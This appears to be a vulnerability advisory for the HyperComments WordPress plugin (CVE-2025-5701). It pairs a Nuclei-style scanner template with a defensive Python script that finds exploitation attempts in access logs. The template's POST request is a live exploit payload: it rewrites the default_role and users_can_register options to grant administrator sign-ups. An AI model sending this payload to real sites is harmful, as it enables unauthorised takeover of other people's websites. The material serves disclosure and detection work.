The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
PoC code [publicly available]
id: CVE-2025-5701

info:
  name: HyperComments <= 1.2.2 - Arbitrary Options Update
  author: kylew1004
  severity: critical
  description: |
    The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
  reference:
    - https://github.com/Nxploited/CVE-2025-5701/blob/main/CVE-2025-5701.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5701
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-5701
    epss-score: 0.11045
    epss-percentile: 0.93124
    cwe-id: CWE-862
  metadata:
    verified: false
    max-request: 2
    vendor: wordpress
    product: hypercomments
    fofa-query: body="/wp-content/plugins/hypercomments"
  tags: cve,cve2025,wp,wp-plugin,wordpress,hypercomments,priv-esc,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/hypercomments/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - compare_versions(detected_version, "<= 1.2.2")
        internal: true

    extractors:
      - type: regex
        part: body
        name: detected_version
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php?hc_action=update_options HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"default_role":"administrator","users_can_register":"1"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '(?i)\{\s*"result"\s*:\s*"success"\s*\}'

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"version: " + detected_version'
# digest: 4a0a00473045022100891383b201f4a3531da10232ff2ff5932bb0f7124d83bc7523a6bf0231d20b14022065066865da440a9faa2d8e4cc10e80d5bcd1b13ba9df590678e985c9967ac2a3:922c64590222798bb761d5b6d8e72950
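
A defender-side log check for the request the template above sends, added here as an example (it is not part of the template or the plugin). The log lines are constructed, the combined log format is an assumption, and the check also notes when the same client later requested the standard WordPress registration URL, /wp-login.php?action=register.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (assumed); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2025:09:14:02 +0000] "GET /wp-content/plugins/hypercomments/readme.txt HTTP/1.1" 200 2911 "-" "ExampleClient/1.0"
203.0.113.7 - - [10/Jun/2025:09:14:03 +0000] "POST /wp-admin/index.php?hc_action=update_options HTTP/1.1" 200 20 "-" "ExampleClient/1.0"
198.51.100.20 - - [10/Jun/2025:09:20:41 +0000] "POST /wp-admin/index.php?hc_action=update%5Foptions HTTP/1.1" 403 162 "-" "ExampleClient/1.0"
192.0.2.44 - - [10/Jun/2025:09:31:10 +0000] "GET /wp-admin/index.php HTTP/1.1" 302 0 "-" "ExampleClient/1.0"
203.0.113.7 - - [10/Jun/2025:09:40:55 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 5120 "-" "ExampleClient/1.0"
"""

# Captures client IP, timestamp, method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_option_updates(log_text):
    """Return one record per request carrying hc_action=update_options.

    The query string is percent-decoded first, so update%5Foptions is caught.
    registered_after becomes True if the same client IP later requests
    /wp-login.php?action=register.
    """
    hits, by_ip = [], {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line or a different log format
        url = urlsplit(m["target"])
        query = parse_qs(url.query, keep_blank_values=True)
        if "update_options" in query.get("hc_action", []):
            hit = {"ip": m["ip"], "time": m["ts"], "method": m["method"],
                   "status": int(m["status"]), "registered_after": False}
            hits.append(hit)
            by_ip.setdefault(m["ip"], []).append(hit)
        elif (url.path.endswith("/wp-login.php")
              and "register" in query.get("action", [])):
            for hit in by_ip.get(m["ip"], []):
                hit["registered_after"] = True
    return hits

if __name__ == "__main__":
    for hit in find_option_updates(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a site running HyperComments 1.2.2 or earlier is a reason to review the `default_role` and `users_can_register` options and the list of administrator accounts.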